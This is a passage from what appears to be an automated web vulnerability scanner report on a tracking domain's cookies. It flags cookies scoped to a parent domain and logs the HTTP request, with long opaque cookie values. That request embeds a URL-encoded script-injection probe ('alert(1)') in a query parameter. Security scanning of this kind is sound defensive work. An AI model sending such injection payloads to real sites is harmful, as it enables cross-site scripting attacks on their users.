Z3g3pUbwU3ChTe2w4iMgYE0rwZZf5LpNds2gECG3zZAfbjF3KG1FCIoCjdAzYh5g5ZbWQ2jN011jYnH4ecXHdn3ceT0SJQNyxMoAA71+f1pYIn+9aH4Bk3tHrq9laUX4l9wgNgjSti9ZxOhSzb7g2fHqqygqPvS+aX0Pm0oEGQldpEekjZsQfiKBNyX/DneA7f/CypSSCNtaDDsonnfNSpBklcNi4bY/t0n2Z5WK0HCdRBJuqZJ8Nrg1tm82nxWLHf/M8k/d0VjYDc/FvxEWvtX3ZM+/++gC+QdS4Uz7JQ0KQ/Jpdh1/+8IfDEnme0rmuBVl25YTq1S32n1Z5cXUfq+9KOylWqlBE0S6zQkXZQBgIxgYl3ZoFdvE6/jtVyuh5jdSAjrzg4JebjZ774LSV6xP+redbMdzWAjZALUH23JsqOMGz8Hq/WqWP/X2IvHbrcv2IvRQyCPVRlh20+ZlqrihQ3tB/Zbzm9mE7B8DV3UXi/T4wHXgbFaAJzX5UKgpBX2CW7TkqyPtmhtZQOnfGFBneT+Vy/8uhXjkWSTt1QSpmXhydn5vcDkVl88gffwl8Ztr8ZGAiHJGpCuraCuZwkZGZ07gO81Q+Sht1LHglUiz5IlGk="; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JSW/NgBmorjQ0ubO+NOVEqMB7SuDqPkIcMw8sszVJiJmSU53IMPd9F9D7kL7x5PWnPsjT8JPMm0oKsLImQRiDIeeoJyRQAQXa1fXueAOxG/0Ph9A4kA2XsDoDZ3nH70SxSOgmLnV5piixzk5resys4dVLm8jlJvGgV2s7kZE5qeMl7fkSUtHy2u5XniqjHIgyt5UffgnxoZaXmXVF2Rx0nAk4ABNCfTkpvx8yrAl5EVSN9Y/ulDlbMHB4QhrzJWNaiN/UTN91SPy0A0xeGq1h3ZPSNN+uN2hodnKE4tvK5XvcxwhYjg8y8BWMde8JrZtD8AKgNrPGGFoXENRIzAYk5jG5SSNgeRa4SWgwFuIXM0sSa/jH5tJIIcY6TkD8KrvaxX0+tYl7q3ISynOsMisqw+xIoRJLbN6keHwZN9VVPAReIXPqRGfyuaKMvZ4o4t6o6oDkBLC064KgMzczLHDaNB2Sk03O/LbbJrxuaBEzEwa+Lenpnj9zA3iLqnWSNb7+gXvpydQAXl/xSXeX9rsi0fGiRKF8BB2zziWbFGtgQ3dBNAiHx9wSNYID9H6KYhUuLjayOlZmkbM4f3B9yp4a3MhRkwQ4MJn6p9IGCQ==; rtc_mCtf=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; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36

Response

12.106. http://pix04.revsci.net/D10898/b3/0/3/1008211/466985162.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/D10898/b3/0/3/1008211/466985162.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF40OhOXMMpjaBv3Dh/hL8rsB4rOfq5QuYnPnKayViGymJW18v6kTo+UWdpq+vTE99BUTLoKtiYg2S0PZEBa5THqhL8Vtypo+SEqfqKrhJdPaHwQlBIe6iD7zXzZlP3ivfC9uJamaWvpbVB00uRyoJCxN4S+wrXmLMg4jrl3qYhDnGjIcgy9gae6cIsXGbuaKjHszrakjzsrBpiP7b6XoVz93fCrKVSnf88GCgSUpNtkT3S15lc2CHhtu8XK1CbHiTE2fU4nj8xJSflN9dF95kDfmCkFTiqyCNwDj+Iwb7m77ukVX0rooAClrM1X1rdn6EG0US43kZKfvsJxw9ZAjl5vuOhGxBLkL0cswvQYaX4r0R4yrutEdJoUzjrMUZTfvke5cSSFsgmL/X+OB15fwGhGvqEgY6dNO0dLGM27qLym4/iwljctD2BrS27lPl1kmLoDTx9AHqSfxgQdqUffqDv7y2cZvCEkvenBU4TMjItTHq0az01AhtBiy6Pk7biH//O86aK5eUhLLyZzUihPdAKP+kndJdxRsPS2JTz38xelQS4B2CmJCdOFHw/yFRFTJeD2xB7vhJ5j0hl5J5yNIi7sA4Wtc3hiT0RGlo2A5x9Kl45d9l+a/IWbcu9J4Vl59+5WbEzVtDgsZnfa6X8vOB3Fa1ahJJ3HhhXP//zqg=; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:33:36 GMT; Path=/
rtc_HXHk=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; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:33:36 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D10898/b3/0/3/1008211/466985162.js?D=DM_LOC%3Dhttp%253A%252F%252Fidolator.com%252Fwp-content2f889%252522%25253E%25253Cscript%25253Ealert(1)%25253C%252Fscript%25253Ed06b96a1bc7%252Fthemes%252Fidolator_1.5%252Fimages%252Ffavicon.ico%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fburp%252Fshow%252F7%26DM_EOM%3D1&C=D10898 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://idolator.com/ifb/audience-science.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1adad3&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4df43073&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzUJZjpr3hc5wFS813GquQMtQrAqXr4DyJtMPyEMN2TS4VlY4qaUGoMGVAYaUgmDvwI5res2yCHqJwUpCl8bXI1x2wD2amdH8k/jmAEMGSOlVkBFtOHkIA6N1ceb/+CvvanugMzfmMxWWXiH+6F/8lLEaTCDxKBO/YXEqzX4Pi64WdCM+73ICL50mkePx5jppZKMzuvHQvSmzKdqHHrrktHJ7LGJATufSzktpJth5OLBEvqEdtzILZmKkac33pw9eJA0okhYvr3qEwAhbz8gJRIOqtT+5cjRdHKlimR/Zf93uEUDyKNOthtBPTpDfREoUp4+5xZWmQJB1g7Bxosyp7HtkUqHuuVgkejaqxCG/g0P7jfgEtR6yLJhEa1Mz7FcRqUGysjKJWzcg5bYZ/ah5Fad96qjRGwPmbnDK5pG67okplQUCPx11iN+fq6uDPiFmZyi0d8JFHm6/2xmN2F6CBXCK6nCSeag6hpLMYOrP3AuUlzqrT7U+Skck+w8glwHhLBLft6YDemqE7Xj0YSR6y4uerWSr2wDFEyV4QJzZ/f+aIOrMR+MkjPltiWeupGgUBrbVnlI24uQ8NgpQcaQKaAFcOoN3NIXqlndo6CvEMQnGhz7gC/JdhZoN7Wj/qpdMetXR/71M7dw3ZB7CuFbBcsMHprOAN3hCv3z/bsOsvah5chlzKYLwxCi8x5S6fQayhX7Wniskh5TCbKxZqXHH+QkNnIBee451U7u3RpQgE9T1SoYQ7zt0XqCh+TO9S2b4Mx54jZr0uA345XOjOU4v7nwrHmxWEA5L0F1MjsUmQnr3tclotWbW2w07LKBIo7yHjwliEDEm1pGvY+a+xfgHap83+GatrgN4ecSGRbCBFgCp+diviMKyrb0nXAwpNhKNkTwtiqdxn6jRuaSmQmu9WZeYV/AULKCZqkDldQFAQhnyVYu13NtRA/BR6BYbX7XsruYKzJ65hL/Vaisc52Il0CA9p8C3UjyqUD+M3O2IfGQZuo2tmWzjMz32TwvlxhESwu6XqR4oJPWtsvLJA1+T3RtNpAFkY6cd++fnc2AzOEeTu5kNwMVtlXikR8rGp9Pg9mwAzQjiMazwVr8v0V9JlbPx+CPllP7ni3ngUtRNGskfAGCc1hOSGLCJxqFvV1MmP4/aoZF6CEdwEEWtAaDLeeBC0kNj/wIEukEprxcgJda2HyyUZ8Hb3n5budHji3Z5USTlT4kELyS0IGH6x/OF7i4jeLIXokyAqHbH2pLeVL7YdRY925o6Xwxo0UorOxWbHFpgiOl1VCgM0O+0weuPSs4jnQ173hP1RYsBdNHJ7HfHDqStStYzQW297VlWqbgULKuXEdCMw2S0AcUlplKJlnmm+8ZiTNZjzyy7PXjlAXzN6v9a7hYqf71T83w1Vf7A//vmNJZ9E2jvUwnvKeU96Tfcz7HTvKmGvis9fi3yNpdVS8Y18CscOUtVKfM+90wLhHo3WeyA4KHZLCXCPmbHEPZI163kCeYdzAGCD4BaQaadnfR6iSrVDGXghSYibeYzhLdX8Y5DCfeLtpNegAnOiNZKbAXJtLJ7EMgKSRXOwK8sVTAXW6bYp+u7INAiKp0chr3RDWlxuB12F0rPA5Y3CezL56SO1BI4S9YU7JCwjBlwIv4QODoc3a1Mbd8YgQKTOkyY8DoLmcIIHLimis0ygM1Bcggp9AvBPj/jKrxx1EMICy1b5gp+NXuJfk9LHBh+rmfQt7otQ==; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=pUPF40mhOQMMpzaxu2F29/z4OklQqCQLAjTX17HF2gQ4O3XYcv0liDtqNncA2iFgL2JciE4z/2iwLDZ28PQPMyyrjZOFz6kMD0dRNPqA+a+NOCNkQDsHIPW8dxRQAQXa1fXueAOxG/0Ph5A4kA2XsDoDZ3nH70SxSOgmLnV5piixzk5resys4dVLW6cIsXGbtqJjkZE1qcPlKt7p5o6gvMbSPNpaNvziuttXWHwW0FxJedPptpMTggk4ABO6XK1CbHgTrAl44Q1jl+nulDlbMHB4sp6xltYF8ou1fUFa5gGLYoadNG+2aE8YStVrM+iW1ffeM4MijsuH0Fw7h+c4dcikBXQ/p4oyLLrCiJr3ja7/o5kNyjxQOPIl5M9lPt3POR4Wy6zZg5M4EFRjA+CuQPofrTk4qAUgzCLtFJPuYfhR8O4l2pdp+3sl/dkyb2x3Erzgnbzs0LYt2/MqDjVX5XObP54/f/11rx7rPaf7gz3RIADO/vjTkY+DOdmyAJFVgn7tmj3WJoX6xGRog6HEXXWN0sVIe3AIOxe9s0OfXq/4AMQG1w9Rr+4KaXMW2quVxox9BSKounUlQssXFrSc3aE6gH/B0GqapSP6aC5Bc9fMgFWYEoPPHrLmVQ9RN9Ps3h8AYiCn0DzQDV9CktIhI7Dnkb/ZUEo2NaKH; rtc_m5HQ=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; rsiPus_uDQu="MLsXtSMNZzhvJZGoecXcxPALrEtuUIEnRIwLv6gxPf3XFAdJyu+HVnGXJyr/FnqFiDd/mf29Yndlb/2TnJTVpVVNUdnVcS9WOi3cWgs8Bnb1xfQKjv19bXYhVOe9PIcfFRR2PTLk5K7xrV1h+U1UrXfyI+jlaTBcbDXW4RCJ288ja/CZio731qSYy3y2XrjyBGwGEtTgYd5JC2wcHYKsxUq6H0CkqhBM8PpLvX3UEyR/oyYWGSyOiG+xxZj4kSzOFLoSw7zQEYEXUwCotW1fyHTzH8ipyEfs4Hm9uoCKK+vU7Q++gOLgDnQi+mtAyBi2QA6N2Ayx/8UA/t7xLmB9C5tGGsL+EjDxyRKBAhcEvJyMFGgD9D981RwedKMUviJg1qA+BLHNp0tqm82E1GcTvs4RAQiKp4CWPfk1U1tvfxWanWN0zQQqJlP2qOTThPUN8J29Q2/aTCZ9wKXaXsSrde5tVBza5i3Xfg0IqZPpkH6cjOwIMZWRYixdNCZ39MPULFv3iwy/vWPfcR3I+R7I9cYccABB9lqVnpl7bNO0NY04p07MPh3JlK+jSK3Se9qcuym/tX8dp6nSncntxLA+HdJJUYG+5K1/xrVtW5oHxvOj+1jBYm4aenb1zUpbGpCfkH5CAyEv1aeG18iYDIsv6snGdMOwcMdhy9PNJ1TzKcMq3YJWL86xe4DFrmjQwdHf+3W8wh5nVIaPJme7udNwUazdPoAME+cnobB2mdO34eNsSBRJdhsMwaPiaqmS14AmXY8dnDxYjIcBqB58H6UjYEkeDJVz8onFe1QRuBvStsyvwucZ3IGnwi7VAY+u2zo0V3qt39YV53iRzeWDL/MMxc5ox0NbpBdVU/FEoOqMSJYguNYUxwIi5r9BfkoH5FbpRU/5HwKF7srhgCivsTPSz7PudfB502THT2AzMgx1figTQ2KusANP0vnuB45ypQSVP9Fbn39vjl13BqieTJTV2PTrVjSuQe71wpk3zv6YhotemVEkSQjaGwZRxutMrAz6nXCh7KsrOvO5ayo1RM2kxVqFojXJuTRL1Zcj6M2wAuZg4qW77qthNv7cwOwfPd6clvqsCAwV1IQfEeq7ELdp9nY6iytxJwTCLdxViYImQlT50DGsQR0vFsPFQjepIXeD5FY3L04zo4jmvlvG+ZxG3MDf0cXKasNYPeWZZOmtkk99Rv8hyU+ZCwZVPHsPQdORwCbYNa5oZOa+KuMpGqjt00+vf36Hz+g9nNTbX9qlGiocPb0KD7YJ0M9jPNXAlNE77lKPrXw7OpRUffgl83qkmz0geOZHoMI2QAnRGaPZHOHGWsVgEnH95neTBzk7fZl43fGR6A=="; rsi_us_1000000="pUM1IymnMBYY1A2AKVvIImQRK15PG8YOjOgZPAZG4lG8Ir7fBa1jUAn9GLtouXUM9fzOo3UkOhVL8nuMmGOoQfF+cfFLfy8VU72PuOqjAdJg13lAr0OlVHb2ymalMt6vtyTl4kNtonTxJKVGqmId1CpSTjV2WtFgCwRDxL6wisceGScbvetKK0ARmEo0Jv/6QhwjTU+TlKGfbHHGIaLif3dNQj45z/Cx+U4rTV1hCBYpqi0qkeVRWn4ezNwTDVBark0v2HV3dHc1G/IkKQ/EIGsQCh05cGzi9uS33CUG46OylzHrrScn8g951ii/uwt9lCfChasln/hVHQPoCqMOfbgygy4tmNkZu29sZPZWaMRkEyJ/9luf2te0/du4eEWtieXpjJNUTgW/+ogNJoI5JejwnvSKKtTSMRgATZ6ASfH82CVOAOSDWc+N3dhOuqH9DPbGlNx4Wtyw0rFPJRR3YA1mYjUixZgWJvj7hyx+2qVSbXFoGiStCmpb56IUsi2WHeHHNTFgbHBDdmeC7bTsrQ7MXvpaG+GBmFQ7QWOerx+VTnLgjkj/rVPitF2uA9ei/cbG+qDqE2jShJj/S6XlMCOZSfM9h+VEkH86l0U0mKM5MK6ZlCAAKli/8grUHMZTQX4Bv6NOwfVnSNqeTG9pwX7uCDFLPHLV3kaBqep6fGSvmko2A2x/J3FB3QzU3wtYWlM5u27FFyaYYHHtTEXARy9KOZ2JI3GkURDvdcvKsoGEYHE1xMN3QYZ0SDeQQ9H98Ag+EfQ/jGpoyzSMCTBMG4Cg92RikJ9i90dX+GGDIzEyQmqvobggZ99Idp+nhfFJ1pTAAsohqJYqeczYOyrxw58M1ALjsNQshiBeceX722dcC8dDh3zf3gGHl2Hk7gBfLSbnQGT8VWC+iP/tvOT6qvay++mLGOoka8n2uBbOpmvjJNrtMFnc0dTlJT6Q6keCE9jKYt3XResMkHJ40xY6g1QQwupGsEXux71coT3HpzF0KO0N1XRQEpnZD2QBBYJkqVmG155x1//AFDOHUYiO6AsC+Sk8E0ks68D1Jyho8ScLyvg4IotUiRR9pdhWDJCIArD3pC/Th7ZvC+eBm1Af05eqCfQiXQJ8/DpDmPdAbcg8aTgNeDicXgP65Y6vh0+e8Uadxc1CNzaO1E8H/dB9Qgx2QN3yCMdVTpFA9cxRmI49OX61+Fsckx/Ij3nU+FzV5ip5ZgPJunDMoNtqwwzbX5SDPbl50X6sDrQewvYPfS3piKXaDOSPSEmkhPZQH8qdcaVTCYs0qpFVolDoH